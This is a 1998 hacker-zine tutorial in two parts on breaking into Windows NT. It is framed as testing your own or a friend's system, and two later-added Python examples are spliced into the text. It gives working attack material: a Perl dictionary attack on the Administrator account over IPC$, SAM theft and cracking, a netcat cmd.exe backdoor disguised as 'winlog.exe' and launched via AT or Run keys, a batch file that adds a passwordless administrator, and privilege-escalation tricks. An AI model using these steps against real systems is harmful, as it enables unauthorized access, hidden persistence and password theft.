__________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING

Vol. 3 No. 10 Part 1

How to Break into Windows NT

____________________________________________________________

by keydet89@yahoo.com

"Improving the security of your site by breaking into it, the NT version"

The purpose of this article is to illustrate to NT users (and sysadmins) how to test and verify the security of their own system or site by breaking into it, using the techniques that an attacker would use. Further, this guide assumes that you are using NT to test an NT system...the Win95 versions of the commands used in this guide aren't as powerful as the NT versions.

***********************************************************
YOU COULD GO TO JAIL WARNING: Gaining unauthorized access to computers is against the law...read the GTMHH files on computer crime and the law. If you want to try out some or all of the techniques presented here, make sure that you get permission.
***********************************************************

In 1993, Dan Farmer and Wietse Venema wrote a paper called "Improving the security of your site by breaking into it." This paper took the view of "what better way to test the computer and network security of your site than by breaking into it." This is a good view to take...try using "hacker" techniques to break into your site to see how vulnerable you are. The paper in question can be found at: http://www.trouble.org/security.

A good place to start for reference is a previous GTMHH entitled "NT Security - Locking down the system". This guide discusses some of the steps that need to be taken to secure an NT workstation or standalone server. The guide also contains links to files that contain more in-depth information and explanations, as well as information particular to sysadmins.
In review of the previous guide, some "light" reading:

Hobbitt's CIFS file at http://207.98.195.250/texts/cifs.txt
Vacuum's NT Exploits document at http://207.89.195.250/texts/
NeonSurge's documents at http://207.89.195.250/texts/
Santeria Systems' "Hardening NT" document at http://pw2.netcom.com/~honeyluv/index.html

Most of the techniques outlined in this guide are meant to be run against the local system, by using the IP address assigned by your ISP. However, it's more fun to get with your friends, and connect your systems to the Internet. Then meet at one location, and try these techniques against your own systems. The methods described in this guide are intended to be exercises for the reader.

[The Remote Attack]

In order to protect your system from outside attack, you need to think like an attacker. What does an attacker want with your system? Access...it's all about access. Regardless of the motives or ultimate goals, an attacker wants access. Preferably, root/admin access...the attacker wants to gain administrator access to your system, or "own" your system. So to ensure that your system is secure, you need to "attack" it the way the attacker would.

To begin with, you need to see what the attacker sees. In order to find potentially vulnerable NT (or 95) systems, all you need to do is scan a range of IP addresses to see if port 139 is open. Port 139 is the "NetBIOS session" port, which is used in file and print sharing...potentially the most dangerous aspect of NT! To locate systems with port 139 active, get a port scanner like Sam Spade (http://www.blighty.com). Sam Spade lets you scan a range of IP addresses for a single port. Try running whichever port scanner you use against your own system.

********************************************************************
NEWBIE NOTE: Finding a system with port 139 open does not automatically mean that the target system is 95 or NT.
Un*x and Linux systems run SAMBA, which allows them to share files "the Microsoft way". However, the focus of this guide is NT, so we'll leave SAMBA for another day.
********************************************************************

Okay, so you've run a port scanner against your own system and found port 139 open. The next step is to run the "nbtstat" command against your own system:

c:\>nbtstat -A [ipaddr]

NOTE: Make sure you use the capital "A", and the IP address assigned by your ISP when you dial in. To see the IP address that you were assigned, type "ipconfig /all" at the command prompt.

This will return the NetBIOS Name Table of your system. The files mentioned above from the Rhino9 site (http://207.89.195.250/texts/) go into more detail regarding what everything in the table refers to, but what we (and the attacker) are interested in are the hex codes in the center column of the table. If you see a code '<20>', this means that your system is advertising that it has shares available. The scary thing is that these shares are potentially available via the Internet!! I say "potentially" because we haven't checked yet.

Okay, if you haven't seen the '<20>' code, then you can be relatively sure that you are safe, to some degree. Just remember, as long as a computer is turned on, and especially when it's connected to the Internet, there is no such thing as 100% security.

If you do see the '<20>' code, then the next step is to gather a little information about our system. To do that, we need to go to http://www.ntsecurity.com/ and get a copy of the RedButton program. RedButton is a nifty little proof-of-concept program to show that it is possible to log onto an NT system without presenting a username or password. The NTSecurity.com site (http://www.ntsecurity.com/RedButton/default.htm) describes the RedButton program. Run the program against your own system, and see what type of information is available.
You will see any available shares, to include any hidden admin shares (ie, shares that end in "$"). By default, there are several of these shares available...C$, WINNT$, IPC$, etc.

The next step is to attempt to log into your system by using the "net" command. To do this, you need to attempt to connect to the "IPC$" share, which is one of the default, hidden shares that is part of the NT installation. Attempting to make this connection is best done from a remote machine, preferably a friend's NT system. Attempt the connection by typing:

c:\>net use \\[ipaddr]\ipc$

********************************************************************
NEWBIE NOTE: The IPC$ share isn't a "share" in the sense that it is a directory, disk or printer. First off, you can see by the "$" that it's an admin share that is created by default when the system is booted. IPC stands for "interprocess communications", and the IPC$ share provides the capability for logging into the system. Remember that...if the sysadmin for the target server has enabled auditing of successful and failed login attempts, then the IPC$ connection attempt will show up in the EventLog. This is true even if you don't successfully log in...it's recorded as a failed login attempt. The concept of the IPC$ share is covered in greater detail in Hobbitt's CIFS file at http://207.98.195.250/texts/cifs.txt and Vacuum's NT Exploits document at http://207.89.195.250/texts/.
********************************************************************

When this connection is attempted, the currently logged on username and password from the local system are sent for authentication. If you are logged on as "Administrator", this may not be a problem, and only password guesses will be required. If you (rather foolishly) use a "null" password (ie, don't use a password at all), then logging in is a trivial matter. You may laugh, but you would be surprised at the number of NT systems that don't have a password for the Administrator account.
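Going back to the nbtstat name table from the enumeration step: as an added example (not code from the original guide), this Python script parses a constructed "nbtstat -A" listing and reports what an outsider learns from it, including the '<20>' entry the text warns about and the logged-on user name that the Messenger service registers with suffix <03>. The sample listing, host name and user name are made up.

```python
import re

# Constructed sample of "nbtstat -A" output from an NT 4 box (not a real capture).
SAMPLE_NBTSTAT = """\
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
NTBOX          <00>  UNIQUE      Registered
NTBOX          <20>  UNIQUE      Registered
WORKGROUP      <00>  GROUP       Registered
NTBOX          <03>  UNIQUE      Registered
WORKGROUP      <1E>  GROUP       Registered
ADMINISTRATOR  <03>  UNIQUE      Registered

MAC Address = 00-00-00-00-00-00
"""

# What the hex suffix in the center column means (standard NetBIOS suffixes).
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation Service (computer name)",
    ("00", "GROUP"):  "domain or workgroup name",
    ("03", "UNIQUE"): "Messenger Service (computer name or logged-on user)",
    ("20", "UNIQUE"): "Server Service: file and print sharing offered",
    ("1B", "UNIQUE"): "domain master browser",
    ("1C", "GROUP"):  "domain controllers",
    ("1D", "UNIQUE"): "master browser",
    ("1E", "GROUP"):  "browser service elections",
}

ROW = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)", re.M)


def parse_name_table(text):
    """Return a list of (name, suffix, type, status) tuples from nbtstat -A output."""
    return [(name, suffix.upper(), ntype, status)
            for name, suffix, ntype, status in ROW.findall(text)]


def assess_exposure(text):
    """Summarise what an outsider learns from the name table: host name,
    workgroup, logged-on user, and whether shares are being advertised."""
    rows = parse_name_table(text)
    report = {"computer": None, "workgroup": None, "logged_on_user": None,
              "shares_advertised": False, "unrecognised": []}
    for name, suffix, ntype, _status in rows:
        key = (suffix, ntype)
        if key == ("00", "UNIQUE"):
            report["computer"] = name
        elif key == ("00", "GROUP"):
            report["workgroup"] = name
        elif key == ("20", "UNIQUE"):
            report["shares_advertised"] = True   # the '<20>' the text warns about
        elif key not in SUFFIX_MEANING:
            report["unrecognised"].append((name, suffix, ntype))
    # The Messenger Service registers <03> for both the computer name and the
    # currently logged-on user, so the <03> entry that is not the computer name
    # reveals a valid account name to anyone who can reach port 137.
    for name, suffix, ntype, _status in rows:
        if (suffix, ntype) == ("03", "UNIQUE") and name != report["computer"]:
            report["logged_on_user"] = name
    return report


if __name__ == "__main__":
    for field, value in assess_exposure(SAMPLE_NBTSTAT).items():
        print(f"{field:18} {value}")
```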
The 'net' command can also be run using username and password guesses:

c:\>net use \\xxx.xxx.xxx.xxx\ipc$ /user:

This command will either fail, or be completed successfully...the command will not pause waiting for further input, such as a password. That makes this syntax very easy to add to scripts and batch files.

NAT (a program available from http://www.secnet.com) will automate these attempts, based on user-configurable files. NAT can be used in conjunction with dictionary files and wordlists to attack specific user accounts, such as Administrator. If you have changed the name of the Administrator account, as suggested by Microsoft and various professional security consulting firms, you can still use RedButton to determine what that new name is and attack it. Download a copy of NAT (you can get versions of NAT for 95/NT or Linux) and try running it against either your system or your buddy's system.

The downside of NAT is that when given two files, it tries the first username and all of the passwords in the password list, before moving on to the second username. NAT can be configured to some degree, but you can also use tools such as Perl to configure this "dictionary attack" to your own tastes. You can create a Perl script that includes the following command (the backslashes and the "$" are escaped because the string is double-quoted in Perl):

open(IPC, "net use \\\\xxx.xxx.xxx.xxx\\ipc\$ /user: | ");

********************************************************************
NEWBIE NOTE: Perl is a great programming language to learn on your way to other languages, such as C or Java. It's an interpreted language, like Java, but much faster than Java. Also, just about every Un*x sysadmin knows how to program in Perl. Fortunately, there is a version of Perl available for 95 and NT at http://www.activestate.com . There is also a wealth of reference material and examples of Perl scripts available from http://www.perl.com.
********************************************************************

The following Perl script can be used to conduct a dictionary attack against your own system or a friend's system (with his permission, of course):

----- begin script -----
# ipcchk.plx by Keydet89
# script to take names from a text file, and attempt to
# complete the IPC$ connection using the name as both the
# username and password
# successful connections are logged to the log file
# no checking of arguments is provided, user must enter a
# valid IP address for the target server
#
# usage: c:\>perl ipcchk.plx [ipaddr]

open(TEST, "names.txt") || die "Could not open file.";
open(LOG, ">>ipc.log") || die "Could not open log.";

if (length($ARGV[0]) == 0) {
    print "Usage: perl ipcchk.plx [ipaddr]";
    exit(0);
}
$server = $ARGV[0];

# one name per line in names.txt
while (<TEST>) {
    $name = $_;
    chop($name);
    # print "net use \\\\$server\\ipc\$ /user:Administrator $name | \n";
    open(IPC, "net use \\\\$server\\ipc\$ /user:Administrator $name | ");
    while (<IPC>) {
        if ($_ =~ /successfully/) {
            print LOG "$server accepts connections for password $name\n";
            # delete a successful connection to avoid multiple connections to
            # the same machine
            open(DEL, "net use \\\\$server\\ipc\$ /d | ");
            close(DEL);
        }
    }
    close(IPC);
}
close(LOG);
close(TEST);
----- end script -----

This script is easily configurable, and can be run on a system with Perl for Win32 installed. For information on installing Perl for Win32 on your 95 or NT system, see: http://reference.perl.com/query.cgi?windows

Minor modifications to this script will allow you to conduct a similar attack against other accounts on your system.

The IPC$ share is the key to compromising an NT server. It is only following a successful connection that the real work toward exploiting this vulnerability can be done. This is especially true if you've gained access via the Administrator account, or an account in the Administrator group.
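The NEWBIE NOTE earlier points out that every IPC$ attempt lands in the EventLog when logon auditing is turned on. As an added example (not part of the original guide), this Python script shows the detection side of the dictionary attack above: it reads a constructed, flattened export of the Security log (NT 4 event 529 = bad password, 528 = successful logon, logon type 3 = network) and flags bursts of failed network logons per source workstation and account, noting when such a burst ends in a success. The one-event-per-line format, host names and account names are assumptions, not NT's native log layout.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# NT 4 Security log event IDs and the logon type used by "net use" / IPC$.
LOGON_SUCCESS = 528        # "Successful Logon"
LOGON_BAD_PASSWORD = 529   # "Logon Failure: Unknown user name or bad password"
NETWORK_LOGON = 3          # Logon Type 3 = network

# Constructed sample: one event per line as
# "timestamp,event id,account,logon type,source workstation". Not a real log.
SAMPLE_LOG = """\
1998-10-02 22:13:40,529,jsmith,2,NTBOX
1998-10-02 22:14:01,529,Administrator,3,BUDDYNT
1998-10-02 22:14:02,529,Administrator,3,BUDDYNT
1998-10-02 22:14:03,529,administrator,3,BUDDYNT
1998-10-02 22:14:04,529,Administrator,3,BUDDYNT
1998-10-02 22:14:05,529,Administrator,3,BUDDYNT
1998-10-02 22:14:06,529,Administrator,3,BUDDYNT
1998-10-02 22:14:07,529,Administrator,3,BUDDYNT
1998-10-02 22:14:09,528,Administrator,3,BUDDYNT
1998-10-02 22:20:00,529,Administrator,3,OTHERPC
1998-10-02 22:40:00,528,Administrator,3,OTHERPC
"""


def parse_events(text):
    """Parse the flattened log into (timestamp, event_id, account, logon_type, workstation)."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, account, ltype, ws = line.split(",")
        # NT account and machine names are case-insensitive, so normalise them.
        events.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), int(eid),
                       account.lower(), int(ltype), ws.upper()))
    return events


def detect_guessing(events, threshold=5, window=timedelta(seconds=60)):
    """Flag (workstation, account) pairs with `threshold` or more failed network
    logons inside `window`, and report when such a run ends in a successful logon."""
    recent = defaultdict(deque)   # failure timestamps per (workstation, account)
    flagged = set()               # pairs already reported as guessing
    alerts = []
    for ts, eid, account, ltype, ws in sorted(events):
        if ltype != NETWORK_LOGON:
            continue              # a typo at the console (type 2) is not remote guessing
        key = (ws, account)
        if eid == LOGON_BAD_PASSWORD:
            q = recent[key]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()       # drop failures that fell out of the window
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append({"kind": "password guessing", "workstation": ws,
                               "account": account, "failures": len(q), "at": ts})
        elif eid == LOGON_SUCCESS and key in flagged:
            # A success right after a burst of failures: a guess probably worked.
            alerts.append({"kind": "guess succeeded", "workstation": ws,
                           "account": account, "at": ts})
            flagged.discard(key)
            recent[key].clear()
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing(parse_events(SAMPLE_LOG)):
        print(alert)
```

The single failure from OTHERPC followed by a success twenty minutes later is not reported, which is the point of the window: one mistyped password is noise, a burst is not.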
Once you have successfully completed an IPC$ connection to your buddy's machine, you can then try to see if he has any shares available using the 'net' command:

c:\>net view \\[ipaddr]

Depending upon how your friend set up his machine, there may or may not be shares available. If shares are available, you can attempt to connect to them using the 'net' command:

c:\>net use x: \\[ipaddr]\[share]

If this command doesn't work the first time, don't worry. You can follow the same steps as above to attempt a dictionary attack. You shouldn't need to, however, if you gained access to your friend's machine via the Administrator account.

But you're not safe just because you haven't specifically made shares available yourself. Even if the C:\ drive itself isn't specifically shared on the server, you still have access to it as the C$ share if the IPC$ connection leads to Administrator access. Once the connection to the IPC$ share is successfully completed, the next command to attempt is:

c:\>net use g: \\xxx.xxx.xxx.xxx\c$

*******************************************************************
NEWBIE NOTE: Notice this command is a little different from the earlier version of the "net use" command. In this case, the "c$" share is a physical disk on the target server, so you need to assign it a device name on your local machine. To see the syntax for this command, enter "net use /?" at the command prompt.
*******************************************************************

Once you've gained access to the C$ share, type:

c:\>dir g: /p

to view the contents of your friend's C:\ drive.

If you have successfully completed the IPC$ connection, you can do other things besides access 'hidden' (as in 'not anymore!!') shares. Once your friend creates an account for you and places it in the Administrator group, log in via the IPC$ connection. Then click Start -> Run, and type 'regedit'.
Choose Registry -> Connect Network Registry..., and type the IP address of your friend's machine into the dialogue box. Wait a minute, and you will be able to view parts of his Registry.

[Password Cracking]

If you gain access to the system (I should say 'your' system), then there are several things you can do. Let's say you've gone after /etc/passwd files on Un*x systems...how would you do this on an NT system?

NT keeps user passwords in the SAM (Security Accounts Manager) file. When a system is turned on, you generally can't access this file, especially if you are a regular user (ie, not Administrator). However, in the c:\winnt\repair directory, you will see a file called "SAM._". This is the compressed version of the SAM database that is created when the system is installed, and updated whenever the rdisk utility is run. Users have the ability to read (and copy) this file.

Note: The next exercise is intended to be run on your own machine. However, once you have access to a friend's computer and connected to the C$ share (shown above), you can get a copy of the SAM._ file from his machine by typing:

c:\>copy g:\winnt\repair\sam._

So let's have a little fun. First, create several user accounts in User Manager, using blank or easily guessable passwords...words from the dictionary, etc. You can use these accounts to either try breaking into your system, or provide valid accounts to your friends so that only they can log in. After you've created the accounts, have a couple of blank, formatted diskettes available, and type:

c:\>rdisk /s

Follow the instructions that appear in the windows. When you're done, go to the c:\winnt\repair directory, and copy the "SAM._" file to another directory (for the purposes of this exercise, c:\temp).
Now type:

c:\temp>expand SAM._ sam

Now pass the file through SAMDump (you can find SAMDump at http://www.nmrc.org/files/snt/index.html) in order to put the file in a format that is usable by a password cracker:

c:\temp>samdump sam > samfile

You now have a usable "samfile". Now you just need to run a password cracker, such as l0phtcrack (from either http://www.l0pht.com or http://www.nmrc.org/files/snt/index.html) or NTCrack (from either http://www.secnet.com or http://www.nmrc.org/files/snt/index.html).

Once you gain access to your friend's computer, you can leave little backdoors and practical jokes...if your friend has a sense of humor.

Coming next GTMHH: WinNT Back Doors and Practical Jokes!

_______________________________________________________________________
Where are those back issues of GTMHHs and Happy Hacker Digests? Check out the official Happy Hacker Web page at http://www.happyhacker.org.

We are against computer crime. We support good, old-fashioned hacking of the kind that led to the creation of the Internet and a new era of freedom of information. But we hate computer crime. So don't email us about any crimes you have committed!

To subscribe to Happy Hacker and receive the Guides to (mostly) Harmless Hacking, please email hacker@techbroker.com with message "subscribe happy-hacker" in the body of your message.

Copyright 1998 keydet89. You may forward, print out or post this GUIDE TO (mostly) HARMLESS HACKING on your Web site as long as you leave this notice at the end.
_________________________________________________________

__________________________________________________________

GUIDE TO (mostly) HARMLESS HACKING

Vol. 3 No. 10 Part 2

How to Break into Windows NT: Backdoors and Practical Jokes

____________________________________________________________

by keydet89@yahoo.com

[Backdoors and Practical Jokes]

Creating backdoors is how you can ensure your ability to return to the system at will.
This is almost a black art when dealing with Un*x systems, and it can also be done on NT.

netcat, from Weld Pond, takes advantage of any user's ability to use a local port. netcat is a command-line utility that has several switches used to configure its operation. This makes netcat, combined with a properly configured command line launched from a batch file, an excellent choice for a backdoor. (get netcat for NT from http://www.l0pht.com/weld)

The batch file needs to contain:

nc -L -d -p [port] -t -e cmd.exe

L   tells netcat to keep listening after the current session terminates
d   detach - don't open a DOS window when running (IMPORTANT)
p   which port to bind to
t   enable telnet negotiations
e   command to execute upon connection

Copy this command line into a batch file named "runnc.bat" or something similar. Then copy both the netcat executable file and the batch file to a directory that is in the PATH on the target machine...c:\winnt\system32\ is a good place to hide them. Another little trick to keep in mind is to rename the netcat executable from 'nc.exe' to something innocuous, like 'winlog.exe' (and make sure to make the appropriate changes to the batch file). That way, when you or your buddy opens the TaskList, there won't seem to be any 'unusual' programs running. Run the batch file on your own machine, and open the TaskList (right-click on the TaskBar, and choose TaskList)...

Once this batch file is run, all you need to do is connect via telnet, or netcat in client mode:

c:\>nc -v [ipaddress of target] [port]

So how do you run this batch file? By default, NT doesn't have an interactive telnet server installed so that you can just log in, so what do you do? Well, there is a great little service called the Schedule (or 'AT') service, which lets you schedule programs to be run at a later date.
To see if your Schedule service is running, you can either click Control Panel -> Services, and check it, or if you have Perl installed (see above), you can run the following script to see if the service is running, and if not, start it:

----- begin script -----
# atchk.plx
# Script checks to see if AT service is running on local
# machine...if not, starts it. Minor modifications will
# allow you to do the same thing on a remote machine, once
# you have successfully completed the IPC$ connection and have
# Administrator rights.
#
# usage: perl atchk.plx

use Win32::Service;
use Win32;

my %status;
# empty host name means the local machine
Win32::Service::GetStatus('', 'Schedule', \%status);
# CurrentState 4 is SERVICE_RUNNING
die "service is already started\n" if ($status{CurrentState} == 4);
Win32::Service::StartService(Win32::NodeName(), 'Schedule')
    || die "Can't start service\n";
print "Service started\n";

#**Note: This script was modified from:
#http://www.inforoute.cgs.fr/leberre1/perlser.htm
----- end script -----

Note: Only Administrators or members of the Administrators group can run the AT command.

Once installed, the 'runnc.bat' file can be executed via the AT command. The necessary syntax for the AT command is:

AT [\\computername] [time] "command"

or more particularly:

AT [\\computername] [time] runnc.bat

References to commands can be hidden in various places within the registry, set to run when a user logs in:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Note: This last key is where you will find things like AOL's Instant Messenger. The install puts the reference to the app there, but you won't find it in your StartUp box...

Here's another little exercise that you should run on your own machine first, and then try copying it over to a friend's machine and running it via the AT command.
The batch file below uses commands that are native to NT to create a new user account, then make that user a member of the Administrator group:

----- begin batch file -----
@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup "Administrators" /add Admin
net localgroup "Users" /del Admin
----- end batch file -----

What are some other neat little tricks to try? Get Netbus from http://netbus.hypermart.net/ . This little program is similar to Back Orifice, and it runs on NT. (Visit the makers of Back Orifice at http://www.cultdeadcow.com/)

Okay, so you and your 'leet buddies have played around with each other's machines via the Internet, and pretty much walked through the exercises listed above. Now, what are some local 'attacks' that you can run against your own machine?

[Local Attacks]

Let's say you have a couple of accounts on your NT box, at least one with Admin rights, and one or two others with user rights. You've already run through the password cracking exercise and seen how easy it is to get the 'SAM._' file and crack it. So what else can you do?

Well, try the 'getadmin' exploit. This exploit consists of a program and .dll file that will add the user to the Administrator group. Get the necessary files from: http://www.nmrc.org/files/nt/index.html

The Microsoft site has a hotfix for the "getadmin" exploit, located at: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3/getadmin-fix/

General information on security problems addressed by Microsoft can be found at: http://www.microsoft.com/security/issues.htm

For more information on the 'getadmin' exploit, go to http://www.ntsecurity.net and search for 'getadmin'.

All you need to do to test this exploit is log onto your system via a user account, copy the files into a directory, and run getadmin.exe.

Another local exploit similar to the "getadmin" exploit has popped up.
The exploit works like this: the user runs a program called "sechole.exe" and the final result (possibly after a reboot) is that the user now has administrator rights! For more information on this and the zipped archive "sechole.zip", go to: http://www.technotronic.com/microsoft.html

A variation on this exploit involves the Registry setting that determines which program is run as the default debugger (the program run when a user mode program crashes). Usually, the setting is:

Hive:          HKEY_LOCAL_MACHINE
Key:           \Software\Microsoft\Windows NT\CurrentVersion\AeDebug
Value:         Debugger
Data Type:     REG_SZ
Default Value: drwtsn32 -p %ld -e %ld -g

The "Everyone" group has the ability to set the value of this key, and that is essentially how you can exploit it. The debugger runs in the security context of the crashed application, so all you need to do is change the Default Value (via 'regedit') to point to the User Manager, and then crash one of the services that are running. Then you can add accounts to the User Manager...even to the Administrator group.

*******************************************************************
NEWBIE NOTE: Before any changes are made to the Registry, make sure that you make a backup of your current Registry using the "rdisk /s" utility. You can make changes to the Registry by clicking Start -> Run, and entering either 'regedit' or 'regedt32'. Before you attempt any of this, read the files pertaining to the Registry from the Rhino9 site (http://207.89.195.250/texts/), the "Hacker's Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/) and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html).
*******************************************************************

Another local exploit that you can attempt uses the NTFSDOS utility, which is nothing more than a bootable DOS diskette that can read (but not write to) NTFS partitions. This would potentially allow an attacker to make off with copies of system files, to include the SAM database.
The folks at Systems Internals (http://www.sysinternals.com) have not only an NTFSDOS utility available, but also some tools that give the user limited write capability. SysInternals also has NTRecover and NTLocksmith, along with a variety of other useful tools. Get a copy of the utility, and try booting your own system with the diskette in the A:\ drive.

There is a nifty little utility available, one that is essentially a Linux boot disk: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html

The utility comes with rawrite.exe, so that DOS and Windows users can download the utility and create the Linux boot disk. The utility is an NTFS-bootable minimal kernel, with a small program that allows the user to change any password in the SAM database. Alternatively, you can find the Linux binary file (without the rawrite.exe utility) at http://www.nmrc.org/files/snt/index.html, called bootdisk.bin, and according to the description, this is the file you are interested in. You will still need to get a copy of rawrite.exe, in order to write the information to a diskette in a usable form. Carefully read the instructions on the web page for the utility (listed above) and if you are feeling especially '31337', try it out against your own system.

[Final Words]

By now you should be familiar with some of the methods used to attack and compromise an NT system. Hopefully, you have seen fit to try out the exercises on your own system, or against a friend's system (with permission, of course). And it should start becoming clear what it takes to secure a system from attack.

The first step is to become familiar with various exploits by regularly visiting such sites as RootShell (http://www.rootshell.com), the ISS X-Force site (http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net), and NTBugTraq (http://www.ntbugtraq.com).
Then go to the Microsoft Support (http://support.microsoft.com) and Security (http://www.microsoft.com/security) sites to see what the 'official' fixes are...the NTBugTraq site does a great job of keeping track of the latest hotfixes, and which ones are obsolete. The Microsoft Support site is especially useful, because you can search for information or specific KnowledgeBase articles, and print out those that you find useful. The "Hardening NT" document from Santeria Systems (http://pw2.netcom.com/~honeyluv/index.html) provides an excellent guide for protecting your system, complete with references to the appropriate KnowledgeBase article for each step.

Finally, Microsoft maintains a list of security bulletins at: http://www.microsoft.com/security

_________________________________________________________